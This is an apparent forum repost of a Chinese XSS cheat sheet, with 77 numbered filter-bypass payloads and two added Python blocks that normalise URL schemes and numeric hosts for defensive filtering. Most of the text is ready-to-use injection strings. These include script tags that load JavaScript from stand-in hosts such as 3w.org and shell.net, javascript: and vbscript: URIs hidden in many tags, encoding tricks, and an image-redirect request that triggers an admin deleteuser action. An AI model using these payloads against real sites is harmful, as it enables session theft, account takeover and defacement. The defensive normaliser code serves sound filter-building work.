It seems t00ls has fairly little material on XSS; I saw something good and copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..[omitted]..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..[omitted]..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..[omitted]..XSS')>

(11) Embedded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab to split up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multiline embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
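Added here as a defender's counterpart to items 3 through 19 (and item 40), not part of the original post: a normaliser that decodes character references and strips the tab, newline, carriage-return, NUL and leading control characters these vectors rely on before inspecting the scheme, so a filter on URL-valued attributes compares against what the browser actually sees rather than the raw bytes. It generalises beyond IMG SRC to any URL attribute; the sample values, including the example.com path, are constructed.

```python
import html
import re

# Conservative model of how a browser reads a URL-valued attribute:
#  - HTML character references are decoded first (with or without a ';'),
#  - tab, LF, CR and NUL are removed wherever they appear,
#  - leading control characters and spaces are discarded,
#  - the scheme is compared case-insensitively.
_REMOVE_ANYWHERE = re.compile(r"[\t\n\r\x00]")
_LEADING_JUNK = re.compile(r"^[\x01-\x20]+")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.IGNORECASE)
SCRIPT_SCHEMES = frozenset({"javascript", "vbscript"})


def canonical_scheme(raw_value: str) -> str:
    """Lower-cased scheme the browser would act on, or '' if there is none."""
    value = html.unescape(raw_value)
    value = _REMOVE_ANYWHERE.sub("", value)
    value = _LEADING_JUNK.sub("", value)
    m = _SCHEME.match(value)
    return m.group(1).lower() if m else ""


def is_script_url(raw_value: str) -> bool:
    """True when the attribute value resolves to a script-executing scheme."""
    return canonical_scheme(raw_value) in SCRIPT_SCHEMES


# Constructed sample attribute values, one per obfuscation from the list above.
SAMPLES = {
    "mixed_case":   "JaVaScRiPt:alert('XSS')",
    "decimal_ref":  "&#106;avascript:alert('XSS')",
    "hex_ref":      "&#x6A;avascript:alert('XSS')",
    "no_semicolon": "&#0000106avascript:alert('XSS')",
    "tab":          "jav\tascript:alert('XSS')",
    "newline":      "jav\nascript:alert('XSS')",
    "nul":          "java\x00script:alert('XSS')",
    "leading_ws":   " \x0e javascript:alert('XSS')",
    "vbscript":     'vbscript:msgbox("XSS")',
    "benign":       "http://example.com/logo.png",
    "relative":     "/images/logo.png",
}


def classify_samples() -> dict:
    """Map each sample name to True (block) or False (allow)."""
    return {name: is_script_url(value) for name, value in SAMPLES.items()}


if __name__ == "__main__":
    for name, flagged in classify_samples().items():
        print(f"{name:13} {'BLOCK' if flagged else 'allow'}")
```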
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, variant 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, variant 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh to a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter is enough)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as a decimal number
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping the [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping the [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
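Added after items 68 through 76 as a defender's view of the same tricks, not part of the original post: a host canonicaliser that supplies the missing scheme, drops the trailing dot and rewrites decimal, hexadecimal, octal and mixed-radix numeric hosts to dotted-quad form under the classic inet_aton rules, so an allow-list check sees 192.168.0.1 however the address was spelled. It handles one- to four-component numeric hosts in general, not only the four-part forms shown; the sample URLs in the tests are constructed.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit


def _parse_part(part: str) -> int:
    """One dotted component under inet_aton rules: 0x.. hex, leading 0 octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part[2:], 16)
    if re.fullmatch(r"0[0-7]+", part):
        return int(part, 8)
    if re.fullmatch(r"[0-9]+", part):  # also accepts "08", which inet_aton would reject
        return int(part, 10)
    raise ValueError(f"not numeric: {part!r}")


def legacy_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Address a browser derives from a numeric host, or None for an ordinary name.

    One part is the whole 32-bit value; with two or three parts the last
    component absorbs the remaining 24 or 16 bits; four parts is dotted quad.
    """
    parts = host.rstrip(".").split(".")
    if len(parts) > 4:
        return None
    try:
        nums = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    widths = [8] * (len(nums) - 1) + [32 - 8 * (len(nums) - 1)]
    value = 0
    for n, width in zip(nums, widths):
        if n >= 1 << width:  # component overflows its field
            return None
        value = (value << width) | n
    return ipaddress.IPv4Address(value)


def canonical_host(url: str) -> str:
    """Hostname an allow-list should compare against: scheme supplied for
    protocol-relative or bare URLs, lower-cased, trailing dot removed, and
    any numeric host rewritten to dotted-quad form."""
    if "://" not in url:
        url = "http:" + url if url.startswith("//") else "http://" + url
    host = (urlsplit(url).hostname or "").rstrip(".")  # .hostname lower-cases
    ip = legacy_ipv4(host)
    return str(ip) if ip is not None else host
```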